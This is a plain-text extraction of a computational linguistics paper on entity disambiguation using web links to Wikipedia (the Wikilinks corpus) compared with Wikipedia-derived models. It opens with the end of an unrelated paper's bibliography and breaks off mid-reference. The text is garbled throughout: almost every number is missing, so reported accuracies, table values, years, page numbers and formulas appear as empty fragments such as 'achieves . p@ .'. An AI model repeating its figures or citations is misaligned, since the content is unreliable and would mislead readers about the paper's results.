of the association for computational linguistics (acl’ ), main volume, pages – , barcelona, spain, july. kenichi kurihara and taisuke sato. . an appli- cation of the variational bayesian approach to prob- abilistic context-free grammars. international joint conference on natural language language process- ing workshop beyond shallow analyses, march. kenichi kurihara, max welling, and yee-whye teh. . collapsed variational dirichlet process mix- ture models. in proceedings of the th international joint conference on artificial intelligence (ijcai ), pages – , hyderabad, india, january. tom kwiatkowski, sharon goldwater, luke zettlemoyer, and mark steedman. . a probabilistic model of syntactic and semantic acquisition from child-directed utterances and their meanings. in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics, pages – , avignon, france, april. association for compu- tational linguistics. karim lari and steve j young. . applications of stochastic context-free grammars using the inside- outside algorithm. computer speech & language, ( ): – , january. percy liang, slav petrov, michael i jordan, and dan klein. . the infinite pcfg using hierarchical dirichlet processes. in proceedings of the joint conference on empirical methods in natural lan- guage processing and computational natural lan- guage learning (emnlp-conll), pages – , prague, czech republic. percy liang, michael i jordan, and dan klein. . probabilistic grammars and hierarchical dirichlet processes. in the oxford handbook of applied bayesian analysis. oxford university press. mitchell p marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computa- tional linguistics, ( ): – , june. david marecek and zdenek zabokrtsky. . unsu- pervised dependency parsing using reducibility and fertility features. in naacl hlt workshop on induc- tion of linguistic structure, pages – , montréal, canada, june. tahira naseem, harr chen, regina barzilay, and mark johnson. . using universal linguistic knowl- edge to guide grammar induction. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , jeju, republic of korea, july. joakim nivre. . inductive dependency parsing. springer. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of the th international conference on language re- sources and evaluation (lrec- ), pages – , istanbul, turkey, may. anders søgaard. . two baselines for unsuper- vised dependency parsing. in naacl hlt work- shop on induction of linguistic structure, pages – , montréal, canada, june. valentin i spitkovsky, hiyan alshawi, and daniel juraf- sky. . from baby steps to leapfrog: how “less is more” in unsupervised dependency parsing. in hu- man language technologies: the annual con- ference of the north american chapter of the associ- ation for computational linguistics, pages – , los angeles, california, june. mark steedman. . surface structure and interpre- tation. the mit press, january. mark steedman. . the syntactic process. the mit press, september. yee-whye teh, michael i jordan, matthew j beal, and david m blei. . hierarchical dirichlet pro- cesses. journal of the american statistical associa- tion, ( ): – . yee-whye teh. . a hierarchical bayesian lan- guage model based on pitman-yor processes. in pro- ceedings of the st international conference on com- putational linguistics and th annual meeting of the association for computational linguistics, pages – , sydney, australia, july. yee-whye teh. . dirichlet process. in encyclope- dia of machine learning, pages – . springer. kewei tu. . combining the sparsity and unambi- guity biases for grammar induction. in naacl hlt workshop on induction of linguistic structure, pages – , montréal, canada, june. entity disambiguation with web links andrew chisholm school of information technologies university of sydney nsw , australia andy.chisholm. @gmail.com ben hachey school of information technologies university of sydney nsw , australia ben.hachey@gmail.com abstract entity disambiguation with wikipedia relies on structured information from redirect pages, article text, inter-article links, and categories. we explore whether web links can replace a curated encyclopaedia, obtaining entity prior, name, context, and coherence models from a corpus of web pages with links to wiki- pedia. experiments compare web link models to wikipedia models on well-known conll and tac data sets. results show that using million web links approaches wikipedia performance. combin- ing web link and wikipedia models produces the best-known disambiguation accuracy of . on standard newswire test data. introduction entity linking (el) resolves mentions in text to their corresponding node in a knowledge base (kb), or nil if the entity is not in the kb. wikipedia and related semantic resources – freebase, dbpedia, yago – have emerged as general repositories of no- table entities. the availability of wikipedia, in par- ticular, has driven work on el, knowledge base pop- ulation (kbp), and semantic search. this literature demonstrates that the rich structure of wikipedia– redirect pages, article text, inter-article links, cat- egories – delivers disambiguation accuracy above % on newswire (he et al., ; alhelbawy and gaizauskas, ). but what disambiguation accu- racy can we expect in the absence of wikipedia’s curated structure? web links provide much of the same information as wikipedia inter-article links: anchors are used to derive alternative names and conditional probabili- ties of entities given names; in-link counts are used to derive a simple entity popularity measure; the text surrounding a link is used to derive textual con- text models; and overlap of in-link sources is used to derive entity cooccurrence models. on the other hand, web links lack analogues of additional wiki- pedia structure commonly used for disambiguation, e.g., categories, encyclopaedic descriptions. more- over, wikipedia’s editors ensure a clean and correct knowledge source while web links are a potentially noisier annotation source. we explore linking with web links versus wiki- pedia. contributions include: ( ) a new bench- mark linker that instantiates entity prior probabili- ties, entity given name probabilities, entity context models, and efficient entity coherence models from wikipedia-derived data sets; ( ) an alternative linker that derives the same model using only alternative names and web pages that link to wikipedia; ( ) de- tailed development experiments, including analysis and profiling of web link data, and a comparison of link and wikipedia-derived models. results suggest that web link accuracy is at least % of a wikipedia linker and that web links are complementary to wikipedia, with the best scores coming from a combination. we argue that these re- sults motivate open publishing of enterprise author- ities and suggest that accumulating incoming links should be prioritised at least as highly as adding richer internal structure to an authority. transactions of the association for computational linguistics, vol. , pp. – , . action editor: ryan mcdonald. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. related work thomas et al. ( ) describe a disambiguation ap- proach that exploits news documents that have been curated by professional editors. in addition to con- sistently edited text, these include document-level tags for entities mentioned in the story. tags are exploited to build textual mention context, assign weights to alternative names, and train a disam- biguator. this leads to an estimated f score of . for end-to-end linking to a kb of , com- panies. our work is similar, but we replace qual- ity curated news text with web pages and explore a larger kb of more than four million entites. in place of document-level entity tags, hyperlinks pointing to wikipedia articles are used to build context, name and coherence models. this is a cheap form of third- party entity annotation with the potential for gener- alisation to any type of web-connected kb. how- ever, it presents an additional challenge in coping with noise, including prose that lacks editorial over- sight and links with anchor text that do not corre- spond to actual aliases. li et al. ( ) explore a similar task setting for microblogs, where short mention contexts exacer- bate sparsity problems for underdeveloped entities. they address the problem by building a topic model based on wikipedia mention link contexts. a boot- strapping approach analogous to query expansion augments the model using web pages returned from the google search api. results suggest that the bootstrapping process is beneficial, improving per- formance from approximately % to % accu- racy. we demonstrate that adding link data leads to similar improvements. the cold start task of the text analysis confer- ence is also comparable. it evaluates how well sys- tems perform end-to-end nil detection, clustering and slot filling. input includes a large document col- lection and a slot filling schema. systems return a kb derived from the document collection that con- forms to the schema. the evaluation target is long- tail or local knowledge. the motivation is the same as our setting, but we focus on cold-start linking rather than end-to-end kb population. finally, recent work addresses linking without http://www.nist.gov/tac/ /kbp/ coldstart/guidelines.html and beyond wikipedia. jin et al. ( ) describe an unsupervised system for linking to a person kb from a social networking site, and shen et al. ( ) de- scribe a general approach for arbitrary kbs. nakas- hole et al. ( ) and hoffart et al. ( ) add a tem- poral dimension to nil detection by focusing on dis- covering and typing emerging entities. tasks and art two evaluations in particular have driven compar- ative work on el: the tac kbp shared tasks and the yago annotation of conll ner data. we describe these tasks and their respective evaluation setup. a brief survey of results outlines the kind of performance we hope to achieve with link data. for task history, we suggest hachey et al. ( ) and shen et al. ( ). for an evaluation survey, see hachey et al. ( ). our evaluation setup follows he et al. ( ) for comparability to their state-of-the-art disambigua- tion results across conll and tac data. table summarises the data sets used. columns correspond to number of documents (|d|), number of entities (|e|), number of mentions (|m|), and number of non-nil mentions (|mkb|). the non-nil mention number represents the set used for evaluation in the disambiguation experiments here. the table also in- cludes average and standard deviation of the candi- date set cardinality over mkb (〈c〉) and the percent- age of mentions in mkb where the correct resolu- tion is in the candidate set (rc). the last column (soa) gives the state-of-the-art score from the liter- ature. numbers are discussed below. . conll conll is a corpus of reuters newswire annotated for whole-document named entity recognition and disambiguation (hoffart et al., ). conll is pub- lic, free and much larger than most entity annota- tion data sets, making it an excellent evaluation tar- get. it is based on the widely used ner data from the conll shared task (tjong kim sang and meulder, ), building disambiguation on ground truth mentions. training and development splits comprise , stories from - august and the held-out test split comprises stories from - december . http://www.nist.gov/tac/ /kbp/coldstart/guidelines.html http://www.nist.gov/tac/ /kbp/coldstart/guidelines.html data set |d| |e| |m| |mkb| (%) 〈c〉 (σ) rc soa conll train , , , ( ) ( ) na conll dev , , , ( ) ( ) . conll test , , , ( ) ( ) . tac train , , , ( ) ( ) . na tac test , , , ( ) ( ) . . table : data sets for disambiguation tasks addressed here. statistics are described in section . the standard evaluation measure is precision@ (p@ ) – the percentage of linkable mentions for which the system ranks the correct entity first (hof- fart et al., ). linkable is defined as ground truth mentions for which the correct entity is a member of the candidate set. this factors out errors due to mention detection, coreference handling, and can- didate generation, isolating the performance of the proposed ranking models. for comparability, we use hoffart et al.’s yago means relations for candidate generation. these alternative names are harvested from wikipedia disambiguation pages, redirects and inter-article links. in the hoffart et al. setting, can- didate recall is %. there are several key benchmark results for the conll data set. hoffart et al. ( ) define the task settings and report the first results. they employ a global graph-based coherence algorithm, leading to a score of . . he et al. ( ) present the most comparable approach. using deep neural networks, they learn entity representations based on similar- ity between link contexts and article text in wiki- pedia. they report performance of . without collective inference, and . when integrating han et al.’s ( ) coherence algorithm. finally, al- helbawy and gaizauskas ( ) report the current best performance of . using a collective approach over a document-specific subgraph. . tac since , the text analysis conference (tac) has hosted an annual el shared task as part of its knowl- edge base population track (kbp) (ji and grishman, ). through , the task is query-driven. in- put includes a document and a name that appears in that document. systems must output a kb identifier for each query, or nil. the kb is derived from a subset of , wikipedia articles. we use data from the shared task for several reasons. first, it facilitates comparison to current art. second, it is a linking-only evaluation as opposed to linking plus nil clustering. finally, it includes comparable train- ing and test data rather than relying on data from earlier years for training. the tac source collection includes news from various agencies and web log data. train- ing data includes a specially prepared set of , web queries. test data includes , queries – , news and web log uniformly distributed across person, organisation, and geo-political en- tities. candidate generation here uses the dbpe- dia lexicalizations data set (mendes et al., ), article titles, and redirect titles. we also add ti- tles and redirects stripped of appositions indicated by a comma (e.g., montgomery, alabama) or opening round bracket (e.g., joe morris (trumpeter)). candidate recall is . and . on the training and test sets – an upper limit on dis- ambiguation accuracy. following he et al., we report kb accuracy (akb ) - the percentage of correctly linked non-nil men- tions - to isolate disambiguation performance. be- fore evaluation, we map wikipedia titles in our out- put to tac kb identifiers using the dalton and di- etz ( ) alignment updated with wikipedia redi- rects. to our knowledge, cucerzan ( ) report the best akb of . for an end-to-end tac entity linking system, while he et al. ( ) report the best akb of . for a disambiguation-focused evaluation. there are a number of differences, e.g.: mention detection for coherence, coreference modelling, and substring matching in candidate generation. analysis shows that these can have a large effect on system perfor- mance (hachey et al., ; piccinno and ferragina, ). we use he et al.’s setup to control for differ- ences and for comparability to he et al.’s results. component articles mentions web links fprior . . . fname . . . fbow . . . fdbow . . . table : p@ results for individual components on the conll development data. the first two columns corre- spond to the wikipedia models described in section . , one derived from article text and the other from mention contexts. the last column corresponds to the web link models described in section . wikipedia benchmark models a wide range of el approaches have been proposed that take advantage of the clean, well-edited infor- mation in wikipedia. these include entity prior models derived from popularity metrics; alias mod- els derived from wikipedia redirects, disambigua- tion pages and inter-article links; textual context models derived from wikipedia article text; and en- tity coherence models derived from the wikipedia inter-article link graph. we survey these models and describe a new benchmark linker that instantiates them from existing wikipedia-derived data sets. for a more detailed survey of features in supervised sys- tems, see meij et al. ( ) and radford ( ). table contains an overview of p@ results for individual components on the conll development data. . entity prior the simplest approach to entity disambiguation ranks candidate entities in terms of their popu- larity. for example, . % of inter-article links in wikipedia point to nikola tesla, while . % point to tesla motors. an entity prior is used in generative models (guo et al., ; han and sun, ) and in supervised systems that incorporate diverse features (radford et al., ). we define the entity prior as the probability of a link pointing to entity e: fprior(e) = log |i∗,e| |i∗,∗| where i∗,e ∈ i∗,∗ is the set of pages that link to entity e. we derive this from dbpedia’s wikipedia pagelinks data set, which contains the link graph between wikipedia pages. missing values are re- placed with a small default log probability of - , which works better than add-one smoothing in de- velopment experiments. on the conll development data, entity prior alone achieves . p@ . . name probability name probability models the relationship between a name and an entity. for example, . % of links with the anchor text ‘tesla’ point to nikola tesla, while . % point to tesla motors. name probability was introduced as an initial score in coherence-driven disambiguation (milne and wit- ten, ), and is used in most state-of-the-art sys- tems (ferragina and scaiella, ; hoffart et al., ; cucerzan, ; radford et al., ). we define name probability as the conditional probabil- ity of a name referring to an entity: fname(e,n) = log |mn,e| |mn,∗| where mn,e is the set of mentions with name n that refer to entity e and mn,∗ is all mentions with name n. we use existing conditional probability estimates from the dbpedia lexicalizations data set (mendes et al., ). this derives mentions from wikipedia inter-article links, where names come from anchor text and referent entities from link targets. estimates for entities that have fewer than five incoming links are discarded. we smooth these estimates using add- one smoothing. on the conll development data, name probability alone achieves . p@ . . textual context textual context goes beyond intrinsic entity and name popularity, providing a means to distinguish between entities based on the words with which they occur. for example, references to tesla the car manufacturer appear in passages with words like ‘company’, ‘electric’, ‘vehicle’. references to the inventor appear with words like ‘engineer’, ‘ac’, ‘electrical’. textual context was the primary com- ponent of the top system in the first tac evaluation (varma et al., ), and is a key component in re- cent art (ratinov et al., ; radford et al., ). http://wiki.dbpedia.org/downloads http://wiki.dbpedia.org/downloads bow context we model textual context as a weighted bag of words (bow), specifically as a term vector ~t containing tfidf weights: tfidf(t,p) = √ f(t,p) · log ( |d| |{d ∈d|t ∈ d}| ) where t is a term, p is a passage of text, f(t,p) is the term frequency of t in p, |d| is the total num- ber of documents, and {d ∈ d|t ∈ d} is the num- ber of documents containing t (salton and buckley, ). we derive the term frequency for an entity e from the corresponding article content in the kopi- wiki plain text extraction (pataki et al., ). terms include three million token - grams from mikolov et al. ( ), with the top by document frequency as stop words. candidate entities are scored using cosine distance between a mention context ~tm and the entity model ~te: fbow(m,e) = − cos(~tm,~te) = − ~tm ·~te ‖~tm‖‖~te‖ on the conll development data, bow context de- rived from wikipedia article text achieves . p@ . we also build entity models from their mention con- texts, i.e., the combined text surrounding all incom- ing links. we project mentions into kopiwiki article text, which yields more contexts than actual wiki- pedia links. for an article a, we tag as mentions all aliases of entities linked to from a. we use aliases from yago means relations (see section . ). to ensure high precision, we only use aliases that are unambiguous with respect to the outlink set, have a length of at least two characters, include at least one upper-case character, and are not a member of the nltk stop list. this is a noisy process, but gives us a pivot to assess whether differences observed later between wikipedia and web link models are due the way the context is modelled or the source of the con- text. the term frequency for an entity e is calculated over the concatenation of all contexts for e. bow context derived from mentions achieves . p@ on the conll development data, five points higher than article text. dbow context while bow context models have been very successful, they require exact matching between terms and a large vocabulary. distribu- tional approaches model terms or concepts as se- mantic vectors (pereira et al., ). dimensional- ity reduction and deep learning improve generalisa- tion and reduce vector size (baroni et al., ). he et al. (he et al., ) report excellent performance using entity representations that optimise the simi- larity between mention contexts and article text in wikipedia. however, this approach necessitates an expensive training process and significant run-time complexity. we introduce a simple distributed bag- of-words (dbow) model that represents context as the tfidf-weighted average over word vectors v: ~vp = |tp| ∑ t∈tp tfidf(t,p) ·~vt where tp is the set of terms in passage p, and ~vt ∈v is the learnt word vector for term t. we use existing -dimensional word embeddings (mikolov et al., ) and score candidates using cosine distance be- tween mention context ~vm and the entity model ~ve: fdbow(m,e) = − cos(~vm,~ve) on the conll development data, dbow context models derived from article text and mention con- text achieve . and . respectively. web link models the models above all have direct anologues in web links to wikipedia articles. however, web links are a comparatively noisy source. for instance, anchors are less likely to be well-formed entity mentions, e.g., in links to semantic web we observe ‘se- mantic markup’ and ‘semantic web activity’ as an- chors. a lack of curation and quality control also allows for the misdirection of links. for exam- ple, we observe links to apple the fruit where the surrounding context indicates an intention to link apple inc instead. it is an open question whether link-derived models are effective in disambiguation. below, we describe how models are instantiated using link data. we leverage the wikilinks corpus of million web pages containing a total of mil- lion links to . million wikipedia pages (singh et al., ). this includes links to english wikipedia pages that pass the following tests: ( ) the page must not have > % of sentences in common with a wikipedia article; ( ) the link must not be inside wikipedia web links pages . m . m entities . m . m pairs . m . m table : comparison of page-entity link graphs from wikipedia and wikilinks (in millions). these graphs are the basis for entity prior features (sections . , . ). a table, near an image, or in obvious boilerplate ma- terial; ( ) at least one token in the anchor text must match a token in the wikipedia title; and ( ) the an- chor text must match a known alias from wikipedia. the corpus provides the web page url, the link an- chor, and local textual content around each link. refer back to table for p@ results for individ- ual web link components on the development data. . entity prior to instantiate fprior, we build a page-entity link graph from wikilinks. where pages and entities are the same in the wikipedia graph, here we have an unweighted bipartite graph of links from web pages to wikipedia articles. on the conll development data, the link-derived entity prior achieves . p@ . table characterises the two graphs. note that the high entity count for wikipedia here includes red links to articles that do not exist. the actual number of entities used in the wikipedia model is . mil- lion. nevertheless, while the two graphs have a sim- ilar number of pages that contain links, wikipedia includes three times as many link pairs to . times as many entities. furthermore, entities average . incoming links in the wikipedia graph, compared to . in the wikilinks graph. nevertheless, the indi- vidual performance of the web link prior is only . points shy of the corresponding wikipedia prior. relative frequencies in wikipedia and wikilinks are similar, especially for entities that show up in the evaluation data. we observe a moderate correla- tion between entity priors from wikipedia and wik- ilinks (ρ = . , p < . ), and a strong correlation across the subset of entities that occur in the devel- opment data (ρ = . , p < . ). . name probability to instantiate fname, we build a name-entity graph from wikilinks. the structure is the same as the cor- wikipedia web links names . m . m entities . m . m table : comparison of name-entity link graphs from wikipedia and wikilinks (in millions). these graphs are the basis for name probability features (sections . , . ). responding model from wikipedia, both are bipar- tite graphs with cooccurrence frequencies on edges. however, names here are sourced from link anchors in web pages rather than wikipedia articles. for comparability with the wikipedia model, we ignore links to entities that occur fewer than five times. we observed no improvement using all links in develop- ment experiments. on the conll development data, link-derived name probability achieves . p@ , more than ten points shy of the wikipedia-derived name probability. table helps to explain this dif- ference. wikilinks has twice as many names linking to the same number of entities, resulting in more am- biguity and sparser models. . textual context to instantiate fbow and fdbow, we follow the same methodology used for wikipedia mention contexts. the term frequency for an entity e is calculated over the concatenation of mention contexts for e. docu- ment frequency is also calculated across aggregated entity contexts. mention contexts include all text in- cluded in the wikilinks data, a window of tokens on average centred on the link anchor. section . showed that wikipedia mention contexts give bet- ter individual performance than wikipedia article texts. web link mentions result in even better per- formance. on the conll development data, bow context achieves . p@ , ten points higher than commonly used wikipedia article model and seven points higher than the analogous wikipedia mention model. dbow context achieves . p@ , . points higher than the wikipedia mention model. table compares wikipedia and wikilinks cov- erage of entities from the conll development set. the second column (|e|) contains the number of unique entities that have usable context. note that the entity universe we consider here is all article pages in english wikipedia ( , , total from the december kopiwiki data set). the third |e| cove covm joint articles , , . mentions , . web links , , . table : coverage of textual context models for each source over entities (e) and mentions (m). t̄e t̄m articles mentions web links table : mean in-vocab tokens per entity (t̄e ) and tokens per mention (t̄m) for each textual context model. and fourth columns correspond to coverage of enti- ties (cove) and mentions (covm) from the conll data set. mention coverage exceeds entity cover- age, highlighting the relationship with prevalence in newswire. the last column contains p@ for the subset of mentions in conll for which the correct resolution is covered by both articles and web links. this isolates context source, demonstrating that link contexts outperform article text. table compares context size in wikilinks to wikipedia. wikilinks bow models are approxi- mately twice the size of wikipedia article models and half the size of wikipedia mention models. this helps to explain why individual mention and link models outperform individual article models. learning to rank to perform disambiguation, we first extract a set of real-valued features for each candidate entity e given a training set of mentions m. features values are standardised to have zero mean and unit variance. parameters of the training distribution are saved for consistent standardisation of test data. we train a support vector machine (svm) clas- sifier to perform pairwise ranking (joachims, ). for each mention in the training set, we derive train- ing instances by comparing the feature vector of the gold link ( ~fg) with each non-gold candidate ( ~fc): (xi,yi) = { (~fg − ~fc, +) if i is odd (~fc − ~fg,−) otherwise articles (i) mentions (i) web links (i) articles (c) mentions (c) web links (c) combined (c) optimal (c) priorprior namename bowbow dbowdbow featuresfeatures p @ p @ figure : individual (i) and cumulative (c) results for ba- sic features on the conll development data. combined includes all features while optimal includes the best sub- set. optimal tracks combined closely, but is just higher. we create instances for the top-ten non-gold candi- dates by sum of absolute feature values: activation(c) = |~fc|∑ i= |~fc,i|. in development experiments, this outperformed ran- dom selection and difference in activation. class as- signment is alternated to balance the training set. to capture non-linear feature relationships we in- corporate a degree- polynomial kernel via explicit feature mapping (chang et al., ). regularisa- tion parameters are selected via grid search over the development set. our final model utilises an l loss function, l weight penalty and c ≈ . . . feature selection sections and describe a total of ten model com- ponents, six from wikipedia and four from wik- ilinks. we select the optimal combination through exhaustive search. figure includes individual and cumulative results on the conll development data. the article, mention and web link models each at- tain their best performance with all component fea- tures (entity, name, bow, and dbow): . , . , and . respectively. adding mention context fea- tures doesn’t improve the more conventional wiki- pedia article model. combining all features gives . , while the optimal configuration achieves . without wikipedia mention contexts. in the remain- ing experiments, optimal refers to wikipedia article wikipedia web links optimal # training mentions# training mentions p @ p @ figure : svm learning curves for best configurations. plus web link features and wikipedia refers to article features alone. . effect of training data size figure compares learning curves for each model on conll development data. the x-axis corre- sponds to p@ scores and the y-axis corresponds to the number of (randomly selected) mentions used in training. all models stabilise early, suggesting , annotated mentions are sufficient for the svm to learn feature weights. possibly due to higher qual- ity and consistency of features, the wikipedia model stabilises earlier, before , annotated mentions. . ablation analysis figure contains an ablation analysis for wikipedia and web link features, as well as the optimal over- all combination of both. the most striking effect is due to the popularity components. removing en- tity prior features reduces p@ by . for wikipedia and . for web link. removing name probability reduces p@ by . for wikipedia and . for web link. in the overall model, the wikipedia popularity components have a much larger impact (prior: - . , name: - . ) than the web link popularity compo- nents (prior: - . , name: - . ). these results show the impact of noisy web links, which appears to be worse for name probability modelling. for context, removing dbow features have a larger impact than bow for both wikipedia (bow: - . , dbow: - . ) and web link (bow: - . , dbow: - . ). all indi- vidual context features have a small impact on the overall model despite redundancy. wikipedia web links optimal - - - - - - - - wikipedia priorwikipedia prior wikipedia namewikipedia name article bowarticle bow article dbowarticle dbow web link priorweb link prior web link nameweb link name web link bowweb link bow web link dbowweb link dbow ∆ p@ ∆ p@ fe a tu re s fe a tu re s figure : ablation analysis of best configurations. adding coherence the model combinations above provide a strong, scalable baseline based on popularity and entity con- text. another approach to context leverages the wikipedia link graph to explicitly model the co- herence among possible resolutions. here, sys- tems define some measure of entity-entity related- ness and maximise the coherence of entity assign- ments across the query document as a whole. this can be done using global methods over the entity link graph (hoffart et al., ), but these have high runtime complexity. we employ a simple approach based on conditional probabilities: pcoh(a|b) = |ia ∩ib| |ib| where ie is the set of documents that link to entity e. the candidate-level feature is the average: fcond(e) = |c| ∑ c∈c log pcoh(e|c) where c is the set of context entities for candidate entity e. for wikipedia and web link coherence, ie models are derived respectively from the set of other articles that link to e and from the set of web pages that link to e. given the same initial ranking from the optimal base model, wikipedia and web link co- herence models alone achieve . and . . . a two-stage classifier to incorporate coherence, we use a two-stage clas- sifier. first, we obtain an initial candidate ranking for each mention using the basic model described (a) conll (b) tac pop ctx pop ctx wikipedia . . . . web links . . . . table : web link components vs. wikipedia. in section above, and populate c from the top- one candidate for each unique context name. a sec- ond classifier incorporates all features, including ba- sic components and coherence. given the same ini- tial ranking, adding coherence improves individual wikipedia and web link models . and . points to . and . p@ on the conll development data. these results suggests that coherence is a powerful feature to overcome low scores in the basic web link model. but, coherence only improves the optimal combination of basic wikipedia and web link fea- tures by . point to . . this suggests coherence may not contribute much on top of an already strong set of basic features. final experiments we report final experiments on the held-out conll and tac test sets. as described in section above, we report p@ for conll following hof- fart et al. ( ) and akb for tac following he et al. ( ). we use a reference implementation to compute evaluation measures and pairwise signifi- cance (hachey et al., ). we bold the superior configuration for each column only if the difference is significant (p < . ). . results can link components replace kb components? table compares performance of basic model com- ponents. the popularity (pop) column contains re- sults using just entity prior and name probability fea- tures. the context (ctx) column contains results using just bow and dbow features. results fol- low trends observed in development experiments. specifically, wikipedia popularity models are bet- ter, but web link context models are better. inter- estingy, web link popularity is significantly indis- tinguishable from wikipedia popularity on tac data. this may be attributed to the fact that tac se- lectively samples difficult mentions. (a) conll (b) tac base +coh base +coh wikipedia . . . . web links . . . . table : web link combinations vs. wikipedia. (a) conll (b) tac base +coh base +coh wikipedia . . . . + web links . . . . table : web links complement wikipedia. can links replace a curated kb? table com- pares performance of the wikipedia and web link systems using the basic feature set alone and with coherence. wikipedia models generally perform better. however, the web link configurations per- form at . , . , . , and % of the wikipedia linker – % on average. this suggests that a link data set can replace a curated kb, with only a small impact on accuracy. results also show that adding coherence improves performance in all cases. do links complement article text? table com- pares a standard wikipedia-only model to a model that also includes features derived from web link data. adding web link data has a strong impact on conll, improving both configurations by approxi- mately points. we observe less impact on tac. nevertheless, the large improvements on conll provide good evidence for complementarity and rec- ommend using both feature sets when available. the state of the art finally, table compares our wikipedia and web link combinations to state- of-the-art numbers from the literature. first, we note that adding coherence to our base model results in a significant improvement on conll test data, but not on tac . for comparison the literature, we re- port % confidence intervals. if a confidence bar overlaps a reported number, the difference can not be assumed significant at p < . . results on tac are competitive with he et al.’s ( ) . . on the conll data, our best system achieves . p@ – a new state of the art. furthermore, the best base model is competitive with previous art that uses complex collective approaches to coherence. dev conll tac base model . . . - % ci [ . , . ] [ . , . ] [ . , . ] base+coh . . . - % ci [ . , . ] [ . , . ] [ . , . ] hoffart . . — houlsby . . — he — . . alhelbawy — . — table : comparison to the disambiguation literature. discussion we set out to determine whether links from exter- nal resources can replace a clean, curated kb. wiki- pedia is an incredible resource that has advanced our understanding of and capabilities for identifying and resolving entity mentions. however, it covers only a small fraction of all entities. applications that re- quire other entities must therefore extend wikipedia or use alternative kbs. we explore a setting where a custom kb is required, but it is possible to har- vest external documents with links into the custom kb. overall, results are promising for using links in a knowledge-poor setting. the link-derived sys- tem performs nearly as well as the rich-kb system on both of our held-out data sets. web link combinations perform at % of wiki- pedia combinations on average. however, creating a kb as rich as wikipedia represents an estimated million hours of human effort (shirky, ). we do not have a comparable estimate for the web link data. however, it is created as byproduct of publish- ing activities and the labour pool is external. con- sidering this and the additional noise in web data, it is remarkable that the web link models do so well with respect to the wikipedia models. we also present detailed experiments compar- ing popularity, context, and coherence components across settings. here, results are even more surpris- ing. as expected, web link popularity and coher- ence models trail wikipedia models. however, web link context models outperform wikipedia context models by to points. we add the web link components into the wiki- pedia system to achieve, to our knowledge, the best published result of . on the conll data set. fur- thermore, results suggest that coherence modelling does not require complex global graph algorithms. our simple approach improves performance over the basic model by one to three points. on the other hand, our basic system without coherence modelling approaches state-of-the-art performance on its own. this suggests that additional popularity and con- text features from web links can replace coherence where efficiency is a concern. we believe these results have a number of impli- cations for management of entity kbs. first, they motivate concerted efforts to link content to kbs since links lead to substantial accuracy improve- ments over a conventional model based on rich kb data alone. second, it informs allocation of editorial resources between interlinking data sets and curat- ing kbs. since models built from link data alone ap- proach state-of-the-art performance, curating links is a reasonable alternative to curating a kb. this is especially true if link curation is cheaper or if links can be created as a byproduct of other content au- thorship and management activities. finally, where kb data is currently proprietary, results here motivate openly publishing kb entities and encouraging their use as a disambiguation end- point for public content. in addition to providing pathways to paid content, incoming links provide a simple means to harvest rich metadata from external content and this can be used to build high-quality resolution systems. a key avenue for future work is to evaluate how well our approach generalises to other web kbs. for instance, incorporating links to sites like freebase or imdb which complement or extend wikipedia’s entity coverage. conclusion despite widespread use in entity linking, wikipedia is clearly not the only source of entity information available on the web. we demonstrate the potential for web links to both complement and completely replace wikipedia derived data in entity linking. this suggests that, given sufficient incoming links, any knowledge base may be used for entity linking. we argue that this motivates open publishing of en- terprise kbs. code is available under an mit license at https://github.com/wikilinks/nel. https://github.com/wikilinks/nel acknowledgments andrew chisholm is supported by a google fac- ulty research award. ben hachey is the recipient of an australian research council discovery early career researcher award (de ). references ayman alhelbawy and robert gaizauskas. . graph ranking for collective named entity disambiguation. in annual meeting of the association for computational linguistics, pages – . marco baroni, georgiana dinu, and germán kruszewski. . don’t count, predict! a systematic compari- son of context-counting vs. context-predicting seman- tic vectors. in annual meeting of the association for computational linguistics, pages – . yin-wen chang, cho-jui hsieh, kai-wei chang, michael ringgaard, and chih-jen lin. . training and testing low-degree polynomial data mappings via linear svm. journal of machine learning research, : – . silviu cucerzan. . tac entity linking by perform- ing full-document entity extraction and disambigua- tion. in text analysis conference. jeffrey dalton and laura dietz. . umass ciir at tac kbp entity linking: query expansion using urban dictionary. in text analysis conference. paolo ferragina and ugo scaiella. . tagme: on-the-fly annotation of short text fragments (by wikipedia entities). in international conference on information and knowledge management, pages – . jiafeng guo, gu xu, xueqi cheng, and hang li. . named entity recognition in query. in international conference on research and development in informa- tion retrieval, pages – . ben hachey, will radford, joel nothman, matthew hon- nibal, and james r. curran. . evaluating en- tity linking with wikipedia. artificial intelligence, : – . ben hachey, joel nothman, and will radford. . cheap and easy entity evaluation. in annual meet- ing of the association for computational linguistics, pages – . xianpei han and le sun. . a generative entity- mention model for linking entities with knowledge base. in annual meeting of the association for com- putational linguistics, pages – . xianpei han, le sun, and jun zhao. . collective entity linking in web text: a graph-based method. in international conference on research and develop- ment in information retrieval, pages – . zhengyan he, shujie liu, mu li, ming zhou, longkai zhang, and houfeng wang. . learning entity representation for entity disambiguation. in annual meeting of the association for computational linguis- tics, pages – . johannes hoffart, mohamed amir yosef, ilaria bordino, hagen fürstenau, manfred pinkal, marc spaniol, bilyana taneva, stefan thater, and gerhard weikum. . robust disambiguation of named entities in text. in conference on empirical methods in natural lan- guage processing, pages – . johannes hoffart, yasemin altun, and gerhard weikum. . discovering emerging entities with ambiguous names. in international world wide web conference, pages – . heng ji and ralph grishman. . knowledge base population: successful approaches and challenges. in annual meeting of the association for computational linguistics, pages – . yuzhe jin, emre kcman, kuansan wang, and ricky loynd. . entity linking at the tail: sparse sig- nals, unknown entities, and phrase models. in inter- national conference on web search and data mining, pages – . thorsten joachims. . optimizing search engines us- ing clickthrough data. in international conference on knowledge discovery and data mining, pages – . yang li, chi wang, fangqiu han, jiawei han, dan roth, and xifeng yan. . mining evidences for named entity disambiguation. in international conference on knowledge discovery and data mining, pages – . edgar meij, wouter weerkamp, and maarten de rijke. . adding semantics to microblog posts. in inter- national conference on web search and data mining, pages – . pablo n. mendes, max jakob, and christian bizer. . dbpedia: a multilingual cross-domain knowledge base. in international conference on language re- sources and evaluation, pages – . tomas mikolov, ilya sutskever, kai chen, greg s cor- rado, and jeff dean. . distributed representations of words and phrases and their compositionality. in advances in neural information processing systems, pages – . david milne and ian 